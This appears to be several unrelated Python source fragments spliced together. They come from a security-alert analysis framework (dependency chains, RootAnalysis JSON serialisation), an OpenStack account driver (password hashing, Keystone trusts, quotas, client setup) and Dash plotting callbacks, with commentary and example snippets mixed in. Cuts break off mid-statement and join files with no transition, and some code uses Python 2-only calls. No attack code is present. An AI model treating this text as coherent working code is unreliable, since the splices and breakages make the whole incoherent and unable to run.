if self.status == AnalysisDependency.STATUS_READY:
self.status = AnalysisDependency.STATUS_COMPLETED
elif self.status == AnalysisDependency.STATUS_COMPLETED:
self.status = AnalysisDependency.STATUS_RESOLVED
@property
def score(self):
score = 0
node = self.next
while node:
score += 1
node = node.next
return score
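The `score` property simply counts how many dependencies follow this one in the singly linked chain. A tiny stand-in class (not the real `AnalysisDependency`) showing the same traversal:

```python
class Dep:
    """Tiny stand-in for AnalysisDependency: a singly linked chain of dependencies."""
    def __init__(self):
        self.next = None

    @property
    def score(self):
        # the score is the number of dependencies that come after this one
        count = 0
        node = self.next
        while node:
            count += 1
            node = node.next
        return count

# build the chain a -> b -> c
a, b, c = Dep(), Dep(), Dep()
a.next, b.next = b, c
```

With this chain, `a.score` is 2, `b.score` is 1, and the tail `c.score` is 0.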
@property
def failed(self):
"""Returns True if this dependency (or any in the chain of dependencies) has failed."""
node = self
while node:
if node.status == AnalysisDependency.STATUS_FAILED:
return True
node = node.next
return False
@property
def delayed(self):
"""Returns True if the target analysis (or any in the chain of dependencies) is delayed."""
if not self.root:
raise RuntimeError("delayed property of AnalysisDependency called before root property was set")
node = self
while node:
target_analysis = self.root.get_observable(node.target_observable_id).get_analysis(node.target_analysis_type)
if target_analysis and target_analysis.delayed:
return True
node = node.next
return False
@property
def json(self):
return {
AnalysisDependency.KEY_TARGET_OBSERVABLE_ID: self.target_observable_id,
AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE: self.target_analysis_type,
AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID: self.source_observable_id,
AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE: self.source_analysis_type,
AnalysisDependency.KEY_STATUS: self.status,
AnalysisDependency.KEY_FAILURE_REASON: self.failure_reason,
}
@staticmethod
def from_json(json_dict):
"""Returns a new AnalysisDependency object from the given JSON dict."""
return AnalysisDependency(target_observable_id=json_dict[AnalysisDependency.KEY_TARGET_OBSERVABLE_ID],
target_analysis_type=json_dict[AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE],
source_observable_id=json_dict[AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID],
source_analysis_type=json_dict[AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE],
status=json_dict[AnalysisDependency.KEY_STATUS],
failure_reason=json_dict[AnalysisDependency.KEY_FAILURE_REASON])
def __str__(self):
return "Analysis Dependency {}({}) --> {}({}) ({}){}".format(
self.source_analysis_type,
self.source_observable_id if self.root is None else self.source_observable,
self.target_analysis_type,
self.target_observable_id if self.root is None else self.target_observable,
self.status,
' failure reason: {}'.format(self.failure_reason) if self.failure_reason else '')
def __repr__(self):
return self.__str__()
@property
def target_observable(self):
"""Returns the target Observable that needs to be analyzed."""
if self._target_observable:
return self._target_observable
self._target_observable = self.root.get_observable(self.target_observable_id)
return self._target_observable
@property
def source_observable(self):
"""Returns the Observable that was being analyzed when the request was made."""
if self._source_observable:
return self._source_observable
self._source_observable = self.root.get_observable(self.source_observable_id)
return self._source_observable
#
# saq.database.Alert vs saq.analysis.Alert
# This system is designed to work both with and without the database running.
# This means you can load Alert objects directly from the JSON rather than
# requiring you to do a database query first.
#
# The hierarchy of relationships goes Analysis --> Alert --> saq.database.Alert
#
class RootAnalysis(Analysis):
"""Root of analysis. Also see saq.database.Alert."""
def __init__(self,
tool=None,
tool_instance=None,
alert_type=None,
desc=None,
event_time=None,
action_counters=None,
details=None,
name=None,
remediation=None,
state=None,
uuid=None,
location=None,
storage_dir=None,
company_name=None,
company_id=None,
analysis_mode=None,
*args, **kwargs):
import uuid as uuidlib
super().__init__(*args, **kwargs)
# this is set to True if a field backed by JSON is modified
# XXX for now we just force this to write every time
# XXX it's going to be complex to track all the changes in the tree without a proper event system
self._is_modified = True
# we are the root
self.root = self
self._analysis_mode = None
if analysis_mode:
self.analysis_mode = analysis_mode
self._uuid = str(uuidlib.uuid4()) # default is new uuid
if uuid:
self.uuid = uuid
self._tool = None
if tool:
self.tool = tool
self._tool_instance = None
if tool_instance:
self.tool_instance = tool_instance
self._alert_type = None
if alert_type:
self.alert_type = alert_type
self._description = None
if desc:
self.description = desc
self._event_time = None
if event_time:
self.event_time = event_time
self._name = None
if name:
self.name = name
self._remediation = None
if remediation:
self.remediation = remediation
self._details = None
if details:
self.details = details
self._action_counters = {}
if action_counters:
self.action_counters = action_counters
self._location = None
if location:
self.location = location
else:
# if a location is not specified then we default to locally defined value
self.location = saq.SAQ_NODE
self._storage_dir = None
if storage_dir:
self.storage_dir = storage_dir
self._state = {}
if state:
self.state = state
self._company_name = None
try:
# we take the default company ownership from the config file (if specified)
self._company_name = saq.CONFIG['global']['company_name']
except KeyError:
pass
if company_name:
self._company_name = company_name
try:
# we take the default company ownership from the config file (if specified)
self._company_id = saq.CONFIG['global'].getint('company_id')
except KeyError:
pass
if company_id:
self._company_id = company_id
# all of the Observables discovered during analysis go into the observable_store
# these objects are what are serialized to and from JSON
self._observable_store = {} # key = uuid, value = Observable object
# set to True after load() is called
self.is_loaded = False
# we keep track of when delayed initially starts here
# to allow for eventual timeouts when something is wrong
# key = analysis_module:observable_uuid
# value = datetime.datetime of when the first analysis request was made
self.delayed_analysis_tracking = {}
# list of AnalysisDependency objects
self.dependency_tracking = []
# we fire EVENT_GLOBAL_TAG_ADDED and EVENT_GLOBAL_OBSERVABLE_ADDED when we add tags and observables to anything
# (note that we also need to add these global event listeners when we deserialize)
self.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
self.add_event_listener(EVENT_OBSERVABLE_ADDED, self._fire_global_events)
def _fire_global_events(self, source, event_type, *args, **kwargs):
"""Fires EVENT_GLOBAL_* events."""
if event_type == EVENT_TAG_ADDED:
self.fire_event(source, EVENT_GLOBAL_TAG_ADDED, *args, **kwargs)
elif event_type == EVENT_OBSERVABLE_ADDED:
observable = args[0]
observable.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
observable.add_event_listener(EVENT_ANALYSIS_ADDED, self._fire_global_events)
self.fire_event(source, EVENT_GLOBAL_OBSERVABLE_ADDED, *args, **kwargs)
elif event_type == EVENT_ANALYSIS_ADDED:
analysis = args[0]
analysis.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
analysis.add_event_listener(EVENT_OBSERVABLE_ADDED, self._fire_global_events)
self.fire_event(source, EVENT_GLOBAL_ANALYSIS_ADDED, *args, **kwargs)
else:
logging.error("unsupported global event type: {}".format(event_type))
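The pattern in `_fire_global_events` is: the root subscribes itself to local events on every child it sees, and re-fires them as GLOBAL events so that one listener at the root observes the whole tree. A minimal stand-in (not the real Analysis event API) of that re-firing:

```python
class Emitter:
    """Minimal stand-in for the listener re-firing pattern used by _fire_global_events."""
    def __init__(self):
        self._listeners = {}

    def add_event_listener(self, event_type, callback):
        self._listeners.setdefault(event_type, []).append(callback)

    def fire_event(self, source, event_type, *args):
        for callback in self._listeners.get(event_type, []):
            callback(source, event_type, *args)

seen = []
root = Emitter()
# the root listens for a local event and re-fires it as a "global" one
root.add_event_listener('tag_added',
                        lambda s, e, *a: root.fire_event(s, 'global_tag_added', *a))
# a single global listener now observes tags added anywhere
root.add_event_listener('global_tag_added', lambda s, e, *a: seen.append(a[0]))
root.fire_event(root, 'tag_added', 'suspicious')
```

After the local `tag_added` event fires, the global listener has recorded `'suspicious'`.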
#
# the json property is used for internal storage
#
# json keys
KEY_ANALYSIS_MODE = 'analysis_mode'
KEY_ID = 'id'
KEY_UUID = 'uuid'
KEY_TOOL = 'tool'
KEY_TOOL_INSTANCE = 'tool_instance'
KEY_TYPE = 'type'
KEY_DESCRIPTION = 'description'
KEY_EVENT_TIME = 'event_time'
KEY_ACTION_COUNTERS = 'action_counters'
KEY_DETAILS = 'details'
KEY_OBSERVABLE_STORE = 'observable_store'
KEY_NAME = 'name'
KEY_REMEDIATION = 'remediation'
KEY_STATE = 'state'
KEY_LOCATION = 'location'
KEY_NETWORK = 'network'
KEY_COMPANY_NAME = 'company_name'
KEY_COMPANY_ID = 'company_id'
KEY_DELAYED_ANALYSIS_TRACKING = 'delayed_analysis_tracking'
KEY_DEPENDECY_TRACKING = 'dependency_tracking'
@property
def json(self):
result = Analysis.json.fget(self)
result.update({
RootAnalysis.KEY_ANALYSIS_MODE: self.analysis_mode,
RootAnalysis.KEY_UUID: self.uuid,
RootAnalysis.KEY_TOOL: self.tool,
RootAnalysis.KEY_TOOL_INSTANCE: self.tool_instance,
RootAnalysis.KEY_TYPE: self.alert_type,
RootAnalysis.KEY_DESCRIPTION: self.description,
RootAnalysis.KEY_EVENT_TIME: self.event_time,
RootAnalysis.KEY_ACTION_COUNTERS: self.action_counters,
#RootAnalysis.KEY_DETAILS: self.details, <-- this is saved externally
RootAnalysis.KEY_OBSERVABLE_STORE: self.observable_store,
RootAnalysis.KEY_NAME: self.name,
RootAnalysis.KEY_REMEDIATION: self.remediation,
RootAnalysis.KEY_STATE: self.state,
RootAnalysis.KEY_LOCATION: self.location,
RootAnalysis.KEY_COMPANY_NAME: self.company_name,
RootAnalysis.KEY_COMPANY_ID: self.company_id,
RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING: self.delayed_analysis_tracking,
RootAnalysis.KEY_DEPENDECY_TRACKING: self.dependency_tracking,
})
return result
@json.setter
def json(self, value):
assert isinstance(value, dict)
# this is important to do first before we load Observable references
if RootAnalysis.KEY_OBSERVABLE_STORE in value:
self.observable_store = value[RootAnalysis.KEY_OBSERVABLE_STORE]
Analysis.json.fset(self, value)
# load this alert from the given json data
if RootAnalysis.KEY_ANALYSIS_MODE in value:
self.analysis_mode = value[RootAnalysis.KEY_ANALYSIS_MODE]
if RootAnalysis.KEY_UUID in value:
self.uuid = value[RootAnalysis.KEY_UUID]
if RootAnalysis.KEY_TOOL in value:
self.tool = value[RootAnalysis.KEY_TOOL]
if RootAnalysis.KEY_TOOL_INSTANCE in value:
self.tool_instance = value[RootAnalysis.KEY_TOOL_INSTANCE]
if RootAnalysis.KEY_TYPE in value:
self.alert_type = value[RootAnalysis.KEY_TYPE]
if RootAnalysis.KEY_DESCRIPTION in value:
self.description = value[RootAnalysis.KEY_DESCRIPTION]
if RootAnalysis.KEY_EVENT_TIME in value:
self.event_time = value[RootAnalysis.KEY_EVENT_TIME]
if RootAnalysis.KEY_ACTION_COUNTERS in value:
self.action_counters = value[RootAnalysis.KEY_ACTION_COUNTERS]
if RootAnalysis.KEY_NAME in value:
self.name = value[RootAnalysis.KEY_NAME]
if RootAnalysis.KEY_REMEDIATION in value:
self.remediation = value[RootAnalysis.KEY_REMEDIATION]
if RootAnalysis.KEY_STATE in value:
self.state = value[RootAnalysis.KEY_STATE]
if RootAnalysis.KEY_LOCATION in value:
self.location = value[RootAnalysis.KEY_LOCATION]
if RootAnalysis.KEY_COMPANY_NAME in value:
self.company_name = value[RootAnalysis.KEY_COMPANY_NAME]
if RootAnalysis.KEY_COMPANY_ID in value:
self.company_id = value[RootAnalysis.KEY_COMPANY_ID]
if RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING in value:
self.delayed_analysis_tracking = value[RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING]
for key in self.delayed_analysis_tracking.keys():
self.delayed_analysis_tracking[key] = dateutil.parser.parse(self.delayed_analysis_tracking[key])
if RootAnalysis.KEY_DEPENDECY_TRACKING in value:
self.dependency_tracking = value[RootAnalysis.KEY_DEPENDECY_TRACKING]
@property
def analysis_mode(self):
return self._analysis_mode
@analysis_mode.setter
def analysis_mode(self, value):
assert value is None or ( isinstance(value, str) and value )
self._analysis_mode = value
@property
def uuid(self):
return self._uuid
@uuid.setter
def uuid(self, value):
assert isinstance(value, str)
self._uuid = value
self.set_modified()
@property
def tool(self):
"""The name of the tool that generated the alert (ex: splunk)."""
return self._tool
@tool.setter
def tool(self, value):
assert value is None or isinstance(value, str)
self._tool = value
self.set_modified()
@property
def tool_instance(self):
"""The instance of the tool that generated the alert (ex: the hostname of the sensor)."""
return self._tool_instance
@tool_instance.setter
def tool_instance(self, value):
assert value is None or isinstance(value, str)
self._tool_instance = value
self.set_modified()
@property
def alert_type(self):
"""The type of the alert (ex: splunk - ipv4 search)."""
return self._alert_type
@alert_type.setter
def alert_type(self, value):
assert value is None or isinstance(value, str)
self._alert_type = value
self.set_modified()
@property
def description(self):
"""A brief one line description of the alert (ex: high_pdf_xor_kernel32 match in email attachment)."""
return self._description
@description.setter
def description(self, value):
assert value is None or isinstance(value, str)
self._description = value
self.set_modified()
@property
def event_time(self):
"""Returns a datetime object representing the time this event was created or occurred."""
return self._event_time
@event_time.setter
def event_time(self, value):
"""Sets the | |
'sha_v1':
return self.sha_v1_hashpass(username, cloud_pass)
else:
return self.sha_v2_hashpass(username, cloud_pass)
def sha_v2_hashpass(self, username, cloud_pass):
if not cloud_pass or len(cloud_pass) < 32:
raise ValueError("Cloud config ['user']['secret'] is required and " +
"must be of length 32 or more")
if not username:
raise ValueError("Missing username, cannot create hash")
return sha256((username + cloud_pass).encode('utf-8')).hexdigest()
def sha_v1_hashpass(self, username, cloud_pass):
if not cloud_pass:
raise ValueError("Cloud config ['user']['secret'] is required")
if not username:
raise ValueError("Missing username, cannot create hash")
return sha256((cloud_pass + username).encode('utf-8')).hexdigest()
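The only difference between the two schemes is the concatenation order: v2 hashes username then secret, v1 hashes secret then username. A Python 3 sketch (note that `hashlib.sha256` requires bytes, so the strings are encoded first):

```python
from hashlib import sha256

def hashpass_v2(username, secret):
    # v2: username first, then the shared secret
    return sha256((username + secret).encode('utf-8')).hexdigest()

def hashpass_v1(username, secret):
    # v1: shared secret first, then the username
    return sha256((secret + username).encode('utf-8')).hexdigest()
```

Because SHA-256 is not commutative over concatenation order, the two versions yield different digests for the same inputs, which is why the version switch above matters.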
def crypt_hashpass(self, username):
"""
Create a unique password using 'username'
"""
import crypt
cloud_pass = self.get_config('user', 'secret', None)
secret_salt = str(cloud_pass).translate(None, string.punctuation)
password = crypt.crypt(username, secret_salt)
return password
def get_admin_username(self):
return self.user_manager.keystone.username
def get_project_name_for(self, username):
"""
This should always map project to user
For now, they are identical..
TODO: Make this intelligent. use keystone.
"""
return username
def _get_image(self, *args, **kwargs):
return self.image_manager.get_image(*args, **kwargs)
# For one-time caching
def _list_all_images(self, *args, **kwargs):
return self.image_manager.list_images(*args, **kwargs)
def tenant_instances_map(
self,
status_list=None,
match_all=False,
include_empty=False):
"""
Maps 'Tenant' objects to all the 'owned instances' as listed by the admin driver
Optional fields:
* status_list (list) - If provided, only include an instance if its status/task/tmp_status matches a value in the list.
* match_all (bool) - If True, an instance must match ALL statuses in the list.
* include_empty (bool) - If True, include ALL tenants in the map, even those with no instances.
"""
all_projects = self.list_projects()
all_instances = self.list_all_instances()
if include_empty:
project_map = {proj: [] for proj in all_projects}
else:
project_map = {}
for instance in all_instances:
try:
# NOTE: will someday be 'projectId'
tenant_id = instance.extra['tenantId']
project = [p for p in all_projects if p.id == tenant_id][0]
except (IndexError, KeyError):
raise Exception(
"The implementation for recovering a tenant id has changed. Update the code base above this line!")
metadata = instance._node.extra.get('metadata', {})
instance_status = instance.extra.get('status')
task = instance.extra.get('task')
tmp_status = metadata.get('tmp_status', '')
if status_list:
match_fn = all if match_all else any
truth = match_fn(
bool(status_name) and
status_name in (instance_status, task, tmp_status)
for status_name in status_list)
if not truth:
logger.info(
"Skipping instance:%s for tenant:%s because %s matched its statuses (%s - %s - %s)" %
(instance.id,
project.name,
"none of the status names" if not match_all else "not all of the status names",
instance_status,
task,
tmp_status))
continue
instance_list = project_map.get(project, [])
instance_list.append(instance)
project_map[project] = instance_list
return project_map
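The status filter inside tenant_instances_map can be isolated as a small predicate; a sketch with hypothetical statuses:

```python
def matches(status_list, match_all, instance_status, task, tmp_status):
    # all() when every listed status must match; any() when one suffices
    fn = all if match_all else any
    return fn(bool(s) and s in (instance_status, task, tmp_status)
              for s in status_list)

# any-mode: one matching status is enough
assert matches(["active"], False, "active", None, "")
# all-mode: every listed status must appear
assert not matches(["active", "build"], True, "active", None, "")
```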
def list_all_instances(self, **kwargs):
return self.admin_driver.list_all_instances(**kwargs)
def list_all_images(self, **kwargs):
all_images = self.image_manager.list_images(**kwargs)
return all_images
def list_all_snapshots(self, **kwargs):
return [img for img in self.list_all_images(**kwargs)
if 'snapshot' in img.get('image_type', 'image').lower()]
def get_project_by_id(self, project_id):
return self.user_manager.get_project_by_id(project_id)
def get_project(self, project_name, **kwargs):
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs)
return self.user_manager.get_project(project_name, **kwargs)
def _make_tenant_id_map(self):
all_projects = self.list_projects()
tenant_id_map = {project.id: project.name for project in all_projects}
return tenant_id_map
def create_trust(
self,
trustee_project_name, trustee_username, trustee_domain_name,
trustor_project_name, trustor_username, trustor_domain_name,
roles=None, impersonation=True):
"""
Trustee == Consumer
Trustor == Resource Owner
Given the *names* of projects, users, and domains
gather all required information for a Trust-Create
create a new trust object
NOTE: we set impersonation to True
-- it has a 'normal default' of False!
"""
default_roles = [{"name": "admin"}]
trustor_domain = self.openstack_sdk.identity.find_domain(
trustor_domain_name)
if not trustor_domain:
raise ValueError("Could not find trustor domain named %s"
% trustor_domain_name)
trustee_domain = self.openstack_sdk.identity.find_domain(
trustee_domain_name)
if not trustee_domain:
raise ValueError("Could not find trustee domain named %s"
% trustee_domain_name)
trustee_user = self.get_user(
trustee_username, domain_id=trustee_domain.id)
# trustee_project = self.get_project(
# trustee_username, domain_name=trustee_domain.id)
trustor_user = self.get_user(
trustor_username, domain_id=trustor_domain.id)
trustor_project = self.get_project(
trustor_project_name, domain_id=trustor_domain.id)
if not roles:
roles = default_roles
new_trust = self.openstack_sdk.identity.create_trust(
impersonation=impersonation,
project_id=trustor_project.id,
trustor_user_id=trustor_user.id,
trustee_user_id=trustee_user.id,
roles=roles,
domain_id=trustee_domain.id)
return new_trust
def list_trusts(self):
return [t for t in self.openstack_sdk.identity.trusts()]
def clear_local_cache(self):
logger.info("Clearing the cached project-list")
self.project_list = []
def list_projects(self, force=False, **kwargs):
"""
Cached to save time on repeat queries.. Otherwise its a pass-through to user_manager
"""
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs, domain_override='domain')
if not getattr(self, 'project_list', None) or force:
logger.info("Caching a copy of project list")
self.project_list = self.user_manager.list_projects(**kwargs)
return self.project_list
logger.info("Returning cached copy of project list")
return self.project_list
def list_roles(self, **kwargs):
"""
Keystone already accepts 'domain_name' to restrict what roles to return
"""
return self.user_manager.keystone.roles.list(**kwargs)
def get_role(self, role_name_or_id, **list_kwargs):
if self.identity_version > 2:
list_kwargs = self._parse_domain_kwargs(list_kwargs)
role_list = self.list_roles(**list_kwargs)
found_roles = [role for role in role_list if role.id == role_name_or_id or role.name == role_name_or_id]
if not found_roles:
return None
if len(found_roles) > 1:
raise Exception("role name/id %s matched more than one value -- Fix the code" % (role_name_or_id,))
return found_roles[0]
def get_user(self, user_name_or_id, **list_kwargs):
user_list = self.list_users(**list_kwargs)
found_users = [user for user in user_list if user.id == user_name_or_id or user.name == user_name_or_id]
if not found_users:
return None
if len(found_users) > 1:
raise Exception("User name/id %s matched more than one value -- Fix the code" % (user_name_or_id,))
return found_users[0]
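get_role and get_user share the same name-or-id resolution: match on either field, allow exactly one result. A standalone sketch over hypothetical records:

```python
class Rec(object):
    def __init__(self, id, name):
        self.id = id
        self.name = name

def find_one(items, name_or_id):
    # Match on either the id or the name; exactly one result allowed
    found = [r for r in items if name_or_id in (r.id, r.name)]
    if not found:
        return None
    if len(found) > 1:
        raise Exception("name/id %s matched more than one value" % name_or_id)
    return found[0]

roles = [Rec('r1', 'admin'), Rec('r2', 'member')]
assert find_one(roles, 'admin').id == 'r1'
assert find_one(roles, 'missing') is None
```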
def _parse_domain_kwargs(self, kwargs, domain_override='domain_id', default_domain='default'):
"""
CLI's replace domain_name with the actual domain.
We replicate that functionality to avoid operator-frustration.
"""
domain_key = 'domain_name'
if self.identity_version <= 2:
return kwargs
if domain_override in kwargs:
if domain_key in kwargs:
kwargs.pop(domain_key)
return kwargs
if domain_key not in kwargs:
kwargs[domain_key] = default_domain # Set to default domain
domain_name_or_id = kwargs.get(domain_key)
domain = self.openstack_sdk.identity.find_domain(domain_name_or_id)
if not domain:
raise ValueError("Could not find domain %s by name or id."
% domain_name_or_id)
kwargs.pop(domain_key, '')
kwargs[domain_override] = domain.id
return kwargs
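_parse_domain_kwargs is easiest to read as a pure rewrite of the kwargs dict. In this sketch the SDK domain lookup is stubbed with a lambda (the id 'd-123' is made up):

```python
def parse_domain_kwargs(kwargs, domain_override='domain_id',
                        default_domain='default',
                        find_domain_id=lambda name: 'd-123'):
    # An explicit domain_id/domain wins; any domain_name is dropped
    if domain_override in kwargs:
        kwargs.pop('domain_name', None)
        return kwargs
    # Otherwise resolve domain_name (falling back to the default) to a domain id
    name = kwargs.pop('domain_name', default_domain)
    kwargs[domain_override] = find_domain_id(name)
    return kwargs

assert parse_domain_kwargs({'domain_name': 'dept'}) == {'domain_id': 'd-123'}
assert parse_domain_kwargs({'domain_id': 'x', 'domain_name': 'y'}) == {'domain_id': 'x'}
```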
def list_users(self, **kwargs):
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs, domain_override='domain')
return self.user_manager.keystone.users.list(**kwargs)
def get_quota_limit(self, username, project_name):
limits = {}
abs_limits = self.get_absolute_limits()
user_limits = self.get_user_limits(username, project_name)
if abs_limits:
limits.update(abs_limits)
if user_limits:
limits.update(user_limits)
return limits
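get_quota_limit relies on dict.update ordering: user limits are applied last, so they override the provider-wide absolute limits. With hypothetical numbers:

```python
abs_limits = {'cpu': 128, 'instances': 100, 'ram': 512000}  # hypothetical provider limits
user_limits = {'cpu': 16, 'instances': 10}                  # hypothetical per-user quota

limits = {}
limits.update(abs_limits)   # baseline from the absolute limits
limits.update(user_limits)  # user-specific values win on overlap
assert limits == {'cpu': 16, 'instances': 10, 'ram': 512000}
```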
def get_absolute_limits(self):
limits = {}
os_limits = self.admin_driver._connection.ex_get_limits()
try:
absolute_limits = os_limits['absolute']
limits['cpu'] = absolute_limits['maxTotalCores']
limits['floating_ips'] = absolute_limits['maxTotalFloatingIps']
limits['instances'] = absolute_limits['maxTotalInstances']
limits['keypairs'] = absolute_limits['maxTotalKeypairs']
limits['ram'] = absolute_limits['maxTotalRAMSize']
except Exception:
logger.exception("The method for 'reading' absolute limits has changed!")
return limits
def get_user_limits(self, username, project_name):
limits = {}
try:
user_id = self.get_user(username).id
except Exception:
logger.exception("Failed to find user %s" % username)
raise ValueError("Unknown user %s" % username)
try:
project_id = self.get_project(project_name).id
except Exception:
logger.exception("Failed to find project %s" % project_name)
raise ValueError("Unknown project %s" % project_name)
user_limits = self._ex_list_quota_for_user(user_id, project_id)
if not user_limits:
return limits
try:
user_quota = user_limits['quota_set']
limits['cpu'] = user_quota['cores']
limits['floating_ips'] = user_quota['floating_ips']
limits['instances'] = user_quota['instances']
limits['keypairs'] = user_quota['key_pairs']
limits['ram'] = user_quota['ram']
except Exception:
logger.exception("The method for 'reading' user limits has changed!")
return limits
def _ex_list_quota_for_user(self, user_id, tenant_id):
"""
"""
server_resp = self.admin_driver._connection.connection.request('/os-quota-sets/%s?user_id=%s'
% (tenant_id, user_id))
quota_obj = server_resp.object
return quota_obj
def list_usergroup_names(self):
return [user.name for (user, project) in self.list_usergroups()]
def list_usergroups(self):
"""
TODO: This function is AWFUL just scrap it.
"""
users = self.list_users()
groups = self.list_projects()
usergroups = []
admin_usernames = self.core_provider.list_admin_names()
for group in groups:
for user in users:
if user.name in admin_usernames:
continue
if user.name in group.name:
usergroups.append((user, group))
break
return usergroups
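The pairing rule in list_usergroups is a substring test: a user belongs to a group whose name contains the username, admins excluded. A sketch over hypothetical names (the comprehension pairs every matching user, whereas the loop above stops at the first match per group):

```python
users = ['alice', 'bob', 'admin']            # hypothetical usernames
groups = ['alice-project', 'bob-project']    # hypothetical project names
admin_usernames = {'admin'}

pairs = [(u, g) for g in groups for u in users
         if u not in admin_usernames and u in g]
assert ('alice', 'alice-project') in pairs
assert all(u != 'admin' for u, _ in pairs)
```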
def _get_horizon_url(self, tenant_id):
parsed_url = urlparse(self.provider_creds["auth_url"])
return "https://%s/horizon/auth/switch/%s/?next=/horizon/project/" %\
(parsed_url.hostname, tenant_id)
def get_openstack_clients(self, username, password=None, tenant_name=None):
# Build credentials for each manager
all_creds = self._get_openstack_credentials(
username, password, tenant_name)
# Initialize managers with respective credentials
all_clients = self.get_user_clients(all_creds)
openstack_sdk = self.get_openstack_sdk_client(all_creds)
neutron = self.get_neutron_client(all_creds)
glance = self.get_glance_client(all_creds)
tenant = self.get_project(tenant_name)
tenant_id = tenant.id if tenant else None
all_clients.update({
"glance": glance,
"neutron": neutron,
"openstack_sdk": openstack_sdk,
"horizon": self._get_horizon_url(tenant_id)
})
return all_clients
def get_openstack_client(self, identity, client_name):
identity_creds = self.parse_identity(identity)
username = identity_creds["username"]
password = identity_creds["password"]
project_name = identity_creds["tenant_name"]
all_creds = self._get_openstack_credentials(
username, password, project_name)
if client_name == 'neutron':
return self.get_neutron_client(all_creds)
elif client_name == 'glance':
return self.get_glance_client(all_creds)
elif client_name == 'keystone':
return self.get_user_clients(all_creds)['keystone']
elif client_name == 'nova':
return self.get_user_clients(all_creds)['nova']
elif client_name == 'swift':
return self.get_user_clients(all_creds)['swift']
elif client_name == 'openstack':
return self.get_openstack_sdk_client(all_creds)
else:
raise ValueError("Invalid client_name %s" % client_name)
def get_legacy_glance_client(self, all_creds):
all_creds['admin_url'] = all_creds['admin_url'] + '/v2.0'
all_creds['auth_url'] = all_creds['auth_url'] + '/v2.0'
keystone = _connect_to_keystone_v2(**all_creds)
mgr_keystone = self.user_manager.keystone
glance_service = mgr_keystone.services.find(type='image')
glance_endpoint_obj = mgr_keystone.endpoints.find(service_id=glance_service.id)
glance_endpoint = glance_endpoint_obj.publicurl
return _connect_to_glance_by_auth(endpoint=glance_endpoint, session=keystone.session)
def get_glance_client(self, all_creds):
if 'ex_force_auth_version' in all_creds and all_creds['ex_force_auth_version'] == '2.0_password':
return self.get_legacy_glance_client(all_creds)
# Remove the lines above when legacy cloud compatibility is removed
image_creds
showline=True, showspikes=True, spikethickness=1, spikedash='solid',
mirror=True, tickformat=".1f", title_standoff=10, range=[0, scaleup(df[x].max())]
).update_yaxes(spikedash='solid',
showgrid=False,
title_standoff=10,
title=dict(
text=y.translate(
SUP),
standoff=5),
autorange=True,
ticks='outside',
showspikes=True,
spikethickness=1,
showline=True,
mirror=True,
tickformat=".1f",
range=[0, scaleup(df[y].max())]
).update_layout(
clickmode='event+select', hovermode='closest', margin={'l': 80}, autosize=True, font=dict(family='Helvetica')
).update_traces(marker=dict(opacity=0.7, line=dict(width=0.5, color='DarkSlateGrey'),
))
# POPULATE AXIS DROPDOWN 3VAR ENV ANIM
@app.callback([Output('xaxis-anim-3D', 'options'),
Output('yaxis-anim-3D', 'options'),
Output('caxis-anim-3D', 'options')],
[Input('csv-data', 'data')])
def populate_dropdown_3var_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options
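Every populate_dropdown_* callback builds Dash dropdown options the same way: one {'label', 'value'} dict per DataFrame column. A pandas-free sketch over a hypothetical column list:

```python
columns = ['Pressure [Pa]', 'Temperature [K]']   # stand-in for df.columns

# Each column becomes one dropdown entry with matching label and value
options = [{'label': c, 'value': c} for c in columns]
assert options[0] == {'label': 'Pressure [Pa]', 'value': 'Pressure [Pa]'}
```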
# POPULATE COLORBAR SLIDER SCATTER 3VAR ENV ANIM
@app.callback([Output('colorbar-slider', 'min'),
Output('colorbar-slider', 'max'),
Output('colorbar-slider', 'step'),
Output('colorbar-slider', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-anim-3D', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_3Var(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
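The colorbar-slider callbacks all derive their bounds from the column extrema rounded to one decimal, with a fixed 0.1 step; a sketch over hypothetical values:

```python
col = [0.234, 1.987, 0.511]          # hypothetical color column

min_v = round(min(col), 1)
max_v = round(max(col), 1)
step = 0.1
value = [min_v, max_v]               # slider starts spanning the full range
assert (min_v, max_v) == (0.2, 2.0)
```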
# STATE VALUE COLORBAR SLIDER SCATTER 3VAR ENV ANIM
@app.callback(
Output('slider-output-container', 'children'),
[Input('colorbar-slider', 'value')])
def update_output_3Var(value):
return 'You have selected "{}"'.format(value)
# POPULATE 3VAR ENV ANIM FRAME
@app.callback(
Output('anim-frame-3Var', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_3var(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
options = [{'label': i, 'value': i} for i in dff.columns]
return options
# POPULATE GRAPH 3VAR ENV ANIM
@app.callback(Output('my-3D-graph', 'figure'),
[Input('xaxis-anim-3D', 'value'),
Input('yaxis-anim-3D', 'value'),
Input('caxis-anim-3D', 'value'),
Input('colorbar-slider', 'value'),
Input('anim-frame-3Var', 'value')],
[State('csv-data', 'data')])
def update_figure_3Var(x, y, color, color_value, frame, data):
if not data or not color_value:
return dash.no_update
df = pd.read_json(data, orient='split')
color_val = [float(v) for v in color_value]
return px.scatter(df.sort_values(by=[frame]),
x=x,
y=y,
title="",
animation_frame=frame,
animation_group=df.columns[0],
hover_name=df.columns[0],
hover_data={},
template="none",
color=df[color],
